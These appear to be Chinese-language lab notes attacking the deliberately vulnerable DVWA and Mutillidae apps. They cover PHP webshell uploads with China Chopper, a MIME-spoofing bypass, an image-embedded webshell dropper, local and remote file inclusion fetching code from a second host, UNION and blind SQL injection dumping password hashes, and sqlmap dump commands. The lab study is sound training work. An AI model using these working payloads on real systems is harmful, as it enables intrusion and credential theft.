总实验准备:
kali虚拟机、OWASPBWA靶机、win10、XShell
文件上传漏洞[低]
一句话木马,中国菜刀
靶机一定要用NAT连接,桥接方式不安全。因为用靶机复制不了不方便做笔记,所以我用XShell将靶机终端连接在物理机上。查看靶机的IP地址:
root@owaspbwa:~# dhclient eth0
There is already a pid file /var/run/dhclient.pid with pid 2890
killed old client process, removed PID file
Internet Systems Consortium DHCP Client V3.1.3
Copyright 2004-2009 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Listening on LPF/eth0/00:0c:29:40:b1:22
Sending on LPF/eth0/00:0c:29:40:b1:22
Sending on Socket/fallback
DHCPREQUEST of 192.168.137.146 on eth0 to 255.255.255.255 port 67
DHCPACK of 192.168.137.146 from 192.168.137.254
bound to 192.168.137.146 -- renewal in 685 seconds.
在物理机输入靶机的IP地址192.168.137.146,在选项中找到Damn Vulnerable Web Application进入,用户名和密码均为admin。在左侧找到upload,可以试着选择文件上传,但文件大小不能过大,否则上传失败。在右下角处查看后端源码:
<?php
if (isset($_POST['Upload'])) {
$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
$target_path = $target_path . basename( $_FILES['uploaded']['name']);
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
} else {
echo '<pre>';
echo $target_path . ' succesfully uploaded!';
echo '</pre>';
}
}
?>
源码告诉我们上传的文件没有限制是图片,并且它保存的路径在当前目录的/hackable/uploads上。我们将一句话木马shell1.php文件上传到系统中。
<?php @eval($_POST['caidao']);?>
打开中国菜刀,右键添加地址:http://192.167.137.146/dvwa/hackable/uploads/shell1.php,后面小框填$_POST[]中的内容,即caidao。选中地址右键就可以开始搞事情了。
在菜刀中添加地址的下面有个配置框,如果知道系统的数据库密码,还可以查看系统的数据库。
<T>MYSQL</T>
<H>loaclhost</H>
<U>root</U>
<P>owaspbwa</P>
文件上传漏洞[中]
BurpSuite,一句话木马,中国菜刀
在左侧DVWA Security可以选择安全性,这次选中级。
查看一下后端源代码:
<?php
if (isset($_POST['Upload'])) {
$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
$target_path = $target_path . basename($_FILES['uploaded']['name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_type = $_FILES['uploaded']['type'];
$uploaded_size = $_FILES['uploaded']['size'];
if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
} else {
echo '<pre>';
echo $target_path . ' succesfully uploaded!';
echo '</pre>';
}
}
else{
echo '<pre>Your image was not uploaded.</pre>';
}
}
?>
我们发现多添加了一个条件判断,上传mime类型是image/jpeg,即只能上传后缀为.jpg和.jpeg的文件,并且文件大小要小于100000b。直接上传一句话木马shell1.php肯定是不行的。
先将之前放进uploads的所有文件删除:
root@owaspbwa:~# cd /var/www/dvwa
root@owaspbwa:/var/www/dvwa# ls
about.php docs hackable login.php README.md vulnerabilities
CHANGELOG.md dvwa ids_log.php logout.php robots.txt
config external index.php phpinfo.php security.php
COPYING.txt favicon.ico instructions.php php.ini setup.php
root@owaspbwa:/var/www/dvwa# cd hackable/uploads
root@owaspbwa:/var/www/dvwa/hackable/uploads# ls
dvwa_email.png shell1.php
root@owaspbwa:/var/www/dvwa/hackable/uploads# rm -rf *
记住记住!!删除当前目录下所有文件的命令是rm -rf *,不是rm -rf /*,这是删库跑路!!血的教训…
所以我们要用到burpsuite,在火狐浏览器中设置为本地代理后,将发送一句话木马shell1.php的包进行拦截,将包中的Content-Type改为image/jpeg伪造成图片类型。
POST /dvwa/vulnerabilities/upload/ HTTP/1.1
Host: 192.168.137.146
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------115689382727075237242790069120
Content-Length: 509
Origin: http://192.168.137.146
Connection: close
Referer: http://192.168.137.146/dvwa/vulnerabilities/upload/
Cookie: security=medium; PHPSESSID=rdm26d89oh6rmfrfi1khqpkul7; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
Upgrade-Insecure-Requests: 1
-----------------------------115689382727075237242790069120
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
-----------------------------115689382727075237242790069120
Content-Disposition: form-data; name="uploaded"; filename="shell1.php"
Content-Type: application/x-php //改为image/jpeg
<?php @eval($_POST['caidao']);?>
-----------------------------115689382727075237242790069120
Content-Disposition: form-data; name="Upload"
Upload
-----------------------------115689382727075237242790069120--
再发送出去,系统以为我们发送的是图片类型,但实际我们发送的是一句话木马,再用中国菜刀就可以了。
本来想用kali直接渗透,因为Kali本机就装有burp suite,所以很方便,但不会用kali的weevely——类似于中国菜刀的程序,故放弃。
在物理机装好burpsuite,弄好代理,就跟上述操作一样。
文件上传漏洞[高]
查看后端源码:
<?php
if (isset($_POST['Upload'])) {
$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
$target_path = $target_path . basename($_FILES['uploaded']['name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
$uploaded_size = $_FILES['uploaded']['size'];
if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
} else {
echo '<pre>';
echo $target_path . ' succesfully uploaded!';
echo '</pre>';
}
}
else{
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
}
}
?>
这次的条件判断语句是直接检查文件的后缀,上面两种方法都不行。那我们只能是上传图片,如果图片中含有木马,那我们也可以用中国菜刀拿下这个系统。
攻击方法要与文件包含漏洞[低]结合。
文件上传漏洞总结
webshell
小马:一句话木马,即整个shell代码只有一行,一般是系统执行函数
大马:代码量和功能比小马多,一般会进行二次编码加密,防止被安全防火墙/入侵系统检测到
shell2.php
<?php eval($_REQUEST['cmd']);?> //eval 使用php函数,例如phpinfo();
http://192.168.137.146/dvwa/hackable/uploads/shell2.php?cmd=phpinfo();
shell3.php
<?php system($_REQUEST['chopper']);?> //system 使用Linux命令,例如ls,cp,rm
http://192.168.137.146/dvwa/hackable/uploads/shell3.php?chopper=ls /
中国菜刀
shell1.php
<?php @eval($_POST['caidao']);?>
or
<?php eval($_POST[123]);?>
说明:REQUEST是网页端输入变量访问,POST则是使用像中国菜刀之类的工具连接,是C/S架构。
文件包含漏洞[低]
文件包含类似于C语言的include头文件,python的import文件,也类似于函数调用。
本地文件包含(LFI)
http://192.168.137.146/dvwa/vulnerabilities/fi/index.php?page=include.php
http://192.168.137.146/dvwa/vulnerabilities/fi/index.php?page=a.jpg #include.php和a.jpg与index.php在同一路径
http://192.168.137.146/dvwa/vulnerabilities/fi/index.php?page=/etc/passwd #/ect/passwd与index.php路径不同,也可以执行
远程文件包含(RFI)
http://192.168.137.146/dvwa/vulnerabilities/fi/index.php?page=http://web_server/b.jpg
远程文件包含更容易实现。
结合文件上传漏洞[高],我们用本地文件包含。思路是上传图片木马,即图片中包含生成木马的代码,如果系统有文件包含漏洞,就可以执行图片中的代码,生成木马。
利用php://fileter伪协议进行文件包含
查看源码:
<?php
$file = $_GET['page']; //The page we wish to display
?>
$_GET函数表示参数会显示在地址栏上,默认地址为:
http://192.168.137.146/dvwa/vulnerabilities/fi/?page=include.php
准备一张小一点的图片hello.jpg,一个木马:
shell4.php
<?php fputs(fopen("shell4.php","w"), '<?php eval($_POST[caidao]);?>');?>
用cmd生成一个图片木马hi.jpg:
copy hello.jpg/b+shell4.php/a hi.jpg
将图片放入winhex拉到最下面就可以看到木马已经放进图片中了。(或者用记事本打开图片也能看到)
将图片上传后,去到文件包含漏洞页面,执行payload:
http://192.168.137.146/dvwa/vulnerabilities/fi/index.php?page=../../hackable/uploads/hi.jpg
/var/www/dvwa/hackable/uploads //dvwa文件上传访问的目录 hi.jpg
/var/www/dvwa/vulnerabilities/fi //dvwa文件包含访问的目录 shell4.php
执行完后网页会出现一堆乱码,别管它,关键是会在/var/www/dvwa/vulnerabilities/fi目录下生成一个shell4.php文件,正是我们放进图片中的代码生成的一句话木马。
写入菜刀地址:http://192.168.137.146/dvwa/vulnerabilities/fi/shell4.php和密码,成功渗透。
远程文件包含
ip a //查看IP地址:192.168.137.144
vim /var/www/html/chopper.txt
<?php fputs(fopen("shell4.php","w"),'<?php eval($_POST[caidao]);?>');?>
可以打开http://192.168.137.144/chopper.txt试试,如果正常显示我们写进去的内容说明路径没错。
payload:
http://192.168.137.146/dvwa/vulnerabilities/fi/?page=http://192.168.137.144/chopper.txt
执行后在/var/www/dvwa/vulnerabilities/fi目录下生成一个shell4.php文件,成功。
文件包含漏洞[中]
查看源码:
<?php
$file = $_GET['page']; // The page we wish to display
// Bad input validation
$file = str_replace("http://", "", $file);
$file = str_replace("https://", "", $file);
?>
源码的意思是将参数中含有"http://","https://"替换成空,这时只要将限制字符串重写:
http://192.168.137.146/dvwa/vulnerabilities/fi/?page=httphttp://://192.168.137.144/chopper.txt
把中间的http://替换成空,前后一合并就可以访问到远程服务器
第二种方法是用本地文件包含来做,同[低]。
文件包含漏洞[高]
查看源码:
<?php
$file = $_GET['page']; //The page we wish to display
// Only allow include.php
if ( $file != "include.php" ) {
echo "ERROR: File not found!";
exit;
}
?>
基本锁死了。
小知识
robots.txt是爬虫的君子协议,说明哪些目录是不能爬的,一般直接在网址后面输入/robots.txt就可看到,但同时也有一点此地无银三百两的意思,说明这些目录很重要。
Ctrl + L清空终端界面
SQL注入[低]
sql注入分为错误注入、布尔注入、union注入、时间盲注
输入’——单引号,就是要让页面报错,说明它能够接受单引号,有注入点。
查看源码:
<?php
if(isset($_GET['Submit'])){
// Retrieve data
$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
$result = mysql_query($getid) or die('<pre>'%20. mysql_error() . '</pre>'%20);
$num = mysql_numrows($result);
$i = 0;
while ($i < $num) {
$first = mysql_result($result,$i,"first_name");
$last = mysql_result($result,$i,"last_name");
echo '<pre>';
echo 'ID: '%20. $id . '<br>First name: '%20. $first . '<br>Surname: '%20. $last;
echo '</pre>';
$i++;
}
}
?>
在源码上可以看到我们输入的东西根据这条语句去查询:
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
意思是将我们输入的ID的名字显示出来,但如果输入**’ or 1=1 – ddd**,整条语句变为
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '' or 1=1 -- ddd '";
输入的单引号与源码的单引号闭合,1=1永远为真,–是注释后面所有。1=1把所有元组显示出来:
ID: ' or 1=1 -- ddd
First name: admin
Surname: admin
ID: ' or 1=1 -- ddd
First name: Gordon
Surname: Brown
ID: ' or 1=1 -- ddd
First name: Hack
Surname: Me
ID: ' or 1=1 -- ddd
First name: Pablo
Surname: Picasso
ID: ' or 1=1 -- ddd
First name: Bob
Surname: Smith
ID: ' or 1=1 -- ddd
First name: user
Surname: user
但这个只局限于这张表的first_name和last_name,再也查不出其它东西来,于是我们可以通过联合查询,查询其他列甚至其他表。
mysql> select user,password from mysql.user union select user_login,user_pass from wordpress.wp_users;
+------------------+-------------------------------------------+
| user | password |
+------------------+-------------------------------------------+
| root | *73316569DAC7839C2A784FF263F5C0ABBC7086E2 |
| root | *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F |
| debian-sys-maint | *75F15FF5C9F06A7221FEB017724554294E40A327 |
| phpmyadmin | *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F |
| vicnum | *C7847100CDBE29050A338F78EA71F066D196ED98 |
| wordpress | *C260A4F79FA905AF65142FFE0B9A14FE0E1519CC |
| phpbb | *CA1F8B079BB2857835107EA008871B4691769547 |
| dvwa | *D67B38CDCD1A55623ED5F55856A29B9654FF823D |
| mutillidae | *E82A07F59B0D83BEF29F79E41FA0F8A042CE3DE4 |
| yazd | *3758F91540524F48F92FE932883C54F6E802A13A |
| personalblog | *3D118FD3FFC74F534A493C30ADC1F23A48510D9D |
| yazd10 | *30B462BE16C04867D06113304F664BB9A5B573D8 |
| peruggia | *5297BE816CC703E8CB686D205071E9CD9E8F08A4 |
| ghost | *9AE953952D993ED69779E70E28193A1EB8DDF91C |
| gtd-php | *C238B1FA6D14124C867DC9634DEB2CD731212094 |
| getboo | *8FC7327502AA1203AAE881C4A5E2AA1CD6E46CE8 |
| orangehrm | *82183BF1F275E47C2692B1CF81CB7A8FD16CE5EA |
| webcal | *E2E1F0A3459647AACF63319694BCBD107231B10C |
| gallery2 | *DF0F41B82DFDB4AA462186480FA9922EF4BBFCEB |
| tikiwiki | *48529BB639EC6E4C2A6695C4B3D544A9E2A21D4C |
| joomla | *F70658E9BDD2910AC33ACDA164605DFC1DA70A68 |
| jotto | *6126D5A029ACE603DBF187A301C1CCEAEDCFE232 |
| hex | *E5C4AA1177F0A69A9E124CDC2676D4ECCE01E347 |
| webmaster | *ED2048BBC6AFD6E2186982869C7899A7EF38C066 |
| kbloom | *10A99DBC0772291AA6AF9A1A9271945340E4E812 |
| sendmail | *47A91042510E7E966EF4075A934A77A57A9E71FE |
| undertaker | *02EAFACD13AEC2C2E139EA38903B9A84A165DF0B |
| stealth | *0F44FA14B9DFBBFFBDF2F7692868DE1B997C66ED |
| wraith | *93ADDFABFCD5A66C95E97C73240D373413A01275 |
| citizens | *E0E85D302E82538A1FDA46B453F687F3964A99B4 |
| wackopicko | *5FA5F4C9ACD2CA5C1EB9E0EC80175D5FCAA0D7D6 |
| wavsep | *8028371417372EDAD5755F9653E93D7C1E87564C |
| sqlol | *1DB6D61428C07B8E8D6876CC60ECAD01D2CE844A |
| cryptomg | *2132873552FEDF6780E8060F927DD5101759C4DE |
| webgoat.net | *4BA609A0C9C18D80985519932BAC08C604119234 |
| bricks | *255195939290DC6D228944BCC682D2427DA57E21 |
| bwapp | *63C3CE60C4AC4F87F321E54F290A4867684A96C4 |
| admin | 21232f297a57a5a743894a0e4a801fc3 |
| user | ee11cbb19052e40b07aac0ca060c23ee |
+------------------+-------------------------------------------+
39 rows in set (0.08 sec)
再来看以下语句:
mysql> select user,password,host from mysql.user union select user_login,user_pass from wordpress.wp_users;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
说明:union查询前后字段数量必须相同
错误提示选择的表中有不同数量的列,前面有user,password,host而后面只有user_login,user_pass。在实际情况中,由于我们看不到后端源码,所以不知道前面选择了多少字段,所以要试。这种情况下可以用数字代替一个字段:
mysql> select user,password,host from mysql.user union select user_login,user_pass,1 from wordpress.wp_users;
+------------------+-------------------------------------------+---------------+
| user | password | host |
+------------------+-------------------------------------------+---------------+
| root | *73316569DAC7839C2A784FF263F5C0ABBC7086E2 | localhost |
| root | *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F | brokenwebapps |
| root | *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F | 127.0.0.1 |
| debian-sys-maint | *75F15FF5C9F06A7221FEB017724554294E40A327 | localhost |
| phpmyadmin | *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F | localhost |
| vicnum | *C7847100CDBE29050A338F78EA71F066D196ED98 | localhost |
| wordpress | *C260A4F79FA905AF65142FFE0B9A14FE0E1519CC | % |
| phpbb | *CA1F8B079BB2857835107EA008871B4691769547 | % |
| dvwa | *D67B38CDCD1A55623ED5F55856A29B9654FF823D | % |
| mutillidae | *E82A07F59B0D83BEF29F79E41FA0F8A042CE3DE4 | % |
| yazd | *3758F91540524F48F92FE932883C54F6E802A13A | % |
| personalblog | *3D118FD3FFC74F534A493C30ADC1F23A48510D9D | % |
| yazd10 | *30B462BE16C04867D06113304F664BB9A5B573D8 | % |
| peruggia | *5297BE816CC703E8CB686D205071E9CD9E8F08A4 | % |
| ghost | *9AE953952D993ED69779E70E28193A1EB8DDF91C | % |
| gtd-php | *C238B1FA6D14124C867DC9634DEB2CD731212094 | % |
| getboo | *8FC7327502AA1203AAE881C4A5E2AA1CD6E46CE8 | % |
| orangehrm | *82183BF1F275E47C2692B1CF81CB7A8FD16CE5EA | % |
| webcal | *E2E1F0A3459647AACF63319694BCBD107231B10C | localhost |
| gallery2 | *DF0F41B82DFDB4AA462186480FA9922EF4BBFCEB | localhost |
| tikiwiki | *48529BB639EC6E4C2A6695C4B3D544A9E2A21D4C | localhost |
| joomla | *F70658E9BDD2910AC33ACDA164605DFC1DA70A68 | localhost |
| jotto | *6126D5A029ACE603DBF187A301C1CCEAEDCFE232 | % |
| hex | *E5C4AA1177F0A69A9E124CDC2676D4ECCE01E347 | localhost |
| webmaster | *ED2048BBC6AFD6E2186982869C7899A7EF38C066 | localhost |
| kbloom | *10A99DBC0772291AA6AF9A1A9271945340E4E812 | localhost |
| sendmail | *47A91042510E7E966EF4075A934A77A57A9E71FE | localhost |
| undertaker | *02EAFACD13AEC2C2E139EA38903B9A84A165DF0B | localhost |
| stealth | *0F44FA14B9DFBBFFBDF2F7692868DE1B997C66ED | localhost |
| wraith | *93ADDFABFCD5A66C95E97C73240D373413A01275 | localhost |
| citizens | *E0E85D302E82538A1FDA46B453F687F3964A99B4 | localhost |
| wackopicko | *5FA5F4C9ACD2CA5C1EB9E0EC80175D5FCAA0D7D6 | % |
| wavsep | *8028371417372EDAD5755F9653E93D7C1E87564C | localhost |
| sqlol | *1DB6D61428C07B8E8D6876CC60ECAD01D2CE844A | % |
| cryptomg | *2132873552FEDF6780E8060F927DD5101759C4DE | % |
| webgoat.net | *4BA609A0C9C18D80985519932BAC08C604119234 | % |
| bricks | *255195939290DC6D228944BCC682D2427DA57E21 | % |
| bwapp | *63C3CE60C4AC4F87F321E54F290A4867684A96C4 | % |
| admin | 21232f297a57a5a743894a0e4a801fc3 | 1 |
| user | ee11cbb19052e40b07aac0ca060c23ee | 1 |
+------------------+-------------------------------------------+---------------+
40 rows in set (0.00 sec)
如果表中数据太多,这张数据表要跑很久,而你也不需要这么多数据,这时可以限制n行:
mysql> select user,password,host from mysql.user union select user_login,user_pass,1 from wordpress.wp_users limit 5;
+------------------+-------------------------------------------+---------------+
| user | password | host |
+------------------+-------------------------------------------+---------------+
| root | *73316569DAC7839C2A784FF263F5C0ABBC7086E2 | localhost |
| root | *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F | brokenwebapps |
| root | *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F | 127.0.0.1 |
| debian-sys-maint | *75F15FF5C9F06A7221FEB017724554294E40A327 | localhost |
| phpmyadmin | *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F | localhost |
+------------------+-------------------------------------------+---------------+
5 rows in set (0.00 sec)
表中显示的数据是两张表并起来的数据,但重要的数据是我们构造sql语句的表中数据,所以也可直接不要前面表的数据:
mysql> select user,password,host from mysql.user where 1=2 union select user_login,user_pass,1 from wordpress.wp_users limit 5;
+-------+----------------------------------+------+
| user | password | host |
+-------+----------------------------------+------+
| admin | 21232f297a57a5a743894a0e4a801fc3 | 1 |
| user | ee11cbb19052e40b07aac0ca060c23ee | 1 |
+-------+----------------------------------+------+
2 rows in set (0.00 sec)
information_schema库
information_schema是非常重要的库,是数据库字典,包含所有数据库的库信息,表信息。
查询数据库名为dvwa的所有表:
mysql> select TABLE_SCHEMA,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='dvwa';
+--------------+------------+
| TABLE_SCHEMA | TABLE_NAME |
+--------------+------------+
| dvwa | guestbook |
| dvwa | users |
+--------------+------------+
2 rows in set (0.08 sec)
查询数据库名为dvwa的users表的所有列:
mysql> select COLUMN_NAME from information_schema.columns where TABLE_SCHEMA='dvwa' and TABLE_NAME='users';
+-------------+
| COLUMN_NAME |
+-------------+
| user_id |
| first_name |
| last_name |
| user |
| password |
| avatar |
+-------------+
6 rows in set (0.03 sec)
在不知道源码的情况下,输入单引号页面报错,说明有注入漏洞。我们可以输入union试字段**’ union select 1 – d**,页面报错:
The used SELECT statements have a different number of columns
试**’ union select 1,2 – d**,没报错,说明字段是2
ID: ' union select 1,2 -- d
First name: 1
Surname: 2
试**’ union select user(),database() – d**,获得当前用户和当前数据库:
ID: ' union select user(),database() -- d
First name: dvwa@localhost
Surname: dvwa
试**’ union select table_schema,1 from information_schema.tables – dd**,查询所有库名:
ID: ' union select table_schema,1 from information_schema.tables -- dd
First name: information_schema
Surname: 1
ID: ' union select table_schema,1 from information_schema.tables -- dd
First name: dvwa
Surname: 1
网页只显示了两个库,因为这个用户的权限只能看到这两个库。
试**’ union select table_schema,table_name from information_schema.tables – dd**,查询所有库和所有表:
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: CHARACTER_SETS
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: COLLATIONS
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: COLLATION_CHARACTER_SET_APPLICABILITY
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: COLUMNS
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: COLUMN_PRIVILEGES
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: ENGINES
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: EVENTS
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: FILES
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: GLOBAL_STATUS
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: GLOBAL_VARIABLES
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: KEY_COLUMN_USAGE
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: PARTITIONS
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: PLUGINS
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: PROCESSLIST
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: PROFILING
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: REFERENTIAL_CONSTRAINTS
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: ROUTINES
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: SCHEMATA
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: SCHEMA_PRIVILEGES
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: SESSION_STATUS
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: SESSION_VARIABLES
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: STATISTICS
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: TABLES
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: TABLE_CONSTRAINTS
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: TABLE_PRIVILEGES
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: TRIGGERS
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: USER_PRIVILEGES
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: information_schema
Surname: VIEWS
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: dvwa
Surname: guestbook
ID: ' union select table_schema,table_name from information_schema.tables -- dd
First name: dvwa
Surname: users
试**’ union select 1,column_name from information_schema.columns where table_name=‘users’ – dd**,查询users表中的列:
ID: ' union select 1,column_name from information_schema.columns where table_name='users' -- dd
First name: 1
Surname: user_id
ID: ' union select 1,column_name from information_schema.columns where table_name='users' -- dd
First name: 1
Surname: first_name
ID: ' union select 1,column_name from information_schema.columns where table_name='users' -- dd
First name: 1
Surname: last_name
ID: ' union select 1,column_name from information_schema.columns where table_name='users' -- dd
First name: 1
Surname: user
ID: ' union select 1,column_name from information_schema.columns where table_name='users' -- dd
First name: 1
Surname: password
ID: ' union select 1,column_name from information_schema.columns where table_name='users' -- dd
First name: 1
Surname: avatar
知道表中的列名后,可以根据列查询对应列的数据,比如查询账号密码**’ union select user,password from users – dd**:
ID: ' union select user,password from users -- dd
First name: admin
Surname: 21232f297a57a5a743894a0e4a801fc3
ID: ' union select user,password from users -- dd
First name: gordonb
Surname: e99a18c428cb38d5f260853678922e03
ID: ' union select user,password from users -- dd
First name: 1337
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: ' union select user,password from users -- dd
First name: pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: ' union select user,password from users -- dd
First name: smithy
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
ID: ' union select user,password from users -- dd
First name: user
Surname: ee11cbb19052e40b07aac0ca060c23ee
密码是MD5加密的,只要找个MD5解密网页就可知道正确密码。
如果我们需要的信息有4列,但系统给的字段只有2列,我们可以用concat()函数实现字符串合并,’ union select password,concat(first_name,’ ‘, last_name,’ ', user) from users – dd:
ID: ' union select password,concat(first_name,' ', last_name,' ', user) from users -- dd
First name: 21232f297a57a5a743894a0e4a801fc3
Surname: admin admin admin
ID: ' union select password,concat(first_name,' ', last_name,' ', user) from users -- dd
First name: e99a18c428cb38d5f260853678922e03
Surname: Gordon Brown gordonb
ID: ' union select password,concat(first_name,' ', last_name,' ', user) from users -- dd
First name: 8d3533d75ae2c3966d7e0d4fcc69216b
Surname: Hack Me 1337
ID: ' union select password,concat(first_name,' ', last_name,' ', user) from users -- dd
First name: 0d107d09f5bbe40cade3de5c71e9e9b7
Surname: Pablo Picasso pablo
ID: ' union select password,concat(first_name,' ', last_name,' ', user) from users -- dd
First name: 5f4dcc3b5aa765d61d8327deb882cf99
Surname: Bob Smith smithy
ID: ' union select password,concat(first_name,' ', last_name,' ', user) from users -- dd
First name: ee11cbb19052e40b07aac0ca060c23ee
Surname: user user user
在函数被过滤的情况下,可以选择堆叠注入,如:0’;show databases;#,也可以用contact()连接
1';PREPARE hacker from concat('s','elect', ' * from `1919810931114514` ');EXECUTE hacker;#
SQL盲注[低]
输入单引号没有反应,但不一定它没有注入漏洞。可以试一下3’ and sleep(5) – hh,给它一个真条件3,闭合,再停留5秒,发现网页会加载5秒,说明有注入点。发现有注入点的话再去构造注入语句,同SQL注入。
ID: 3' union select user,password from users -- dd
First name: Hack
Surname: Me
ID: 3' union select user,password from users -- dd
First name: admin
Surname: 21232f297a57a5a743894a0e4a801fc3
ID: 3' union select user,password from users -- dd
First name: gordonb
Surname: e99a18c428cb38d5f260853678922e03
ID: 3' union select user,password from users -- dd
First name: 1337
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: 3' union select user,password from users -- dd
First name: pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: 3' union select user,password from users -- dd
First name: smithy
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
ID: 3' union select user,password from users -- dd
First name: user
Surname: ee11cbb19052e40b07aac0ca060c23ee
SQLmap自动化注入
kali中sqlmap一些用法
-u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")
--batch Never ask for user input, use the default behavior
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to provided value
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
--dbs 获取所有数据库
--current-db 获取当前数据库
--users 获取所有用户
--current-user 获取当前用户
-D databese_name --tables 获取database_name的所有表
-D databese_name -T table_name --columns 获取database_name的table_name的所有列
-D databese_name -T table_name -C column_name --dump 获取database_name的table_name的column_name的数据
--cookie=COOKIE 添加cookie
进入OWASP Mutillidae Ⅱ(不需要登录),选择左侧全部首一一栏,进入登录界面,随便输入错误的名字密码后,复制网页地址,用sqlmap查看网页是否有sql注入漏洞:
sqlmap -u "http://192.168.137.146/mutillidae/index.php?page=user-info.php&username=91&password=%3Bohk&user-info-php-submit-button=View+Account+Details" -p username --batch //只看username有无注入漏洞
[14:30:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, PHP, Apache 2.2.14
back-end DBMS: MySQL >= 5.0 //数据库、系统、php等都出来了表示有注入漏洞
[14:30:52] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.137.146'
//获得表中的数据
sqlmap -u "http://192.168.137.146/mutillidae/index.php?page=user-info.php&username=91&password=%3Bohk&user-info-php-submit-button=View+Account+Details" --batch -D nowasp -T accounts -C username,password --dump
Database: nowasp
Table: accounts
[24 entries]
+----------+--------------+
| username | password |
+----------+--------------+
| admin | admin |
| adrian | somepassword |
| john | monkey |
| jeremy | password |
| bryce | password |
| samurai | samurai |
| jim | password |
| bobby | password |
| simba | password |
| dreveil | password |
| scotty | password |
| cal | password |
| john | password |
| kevin | 42 |
| dave | set |
| patches | tortoise |
| rocky | stripes |
| tim | lanmaster53 |
| ABaker | SoSecret |
| PPan | NotTelling |
| CHook | JollyRoger |
| james | i<3devs |
| user | user |
| ed | pentest |
+----------+--------------+
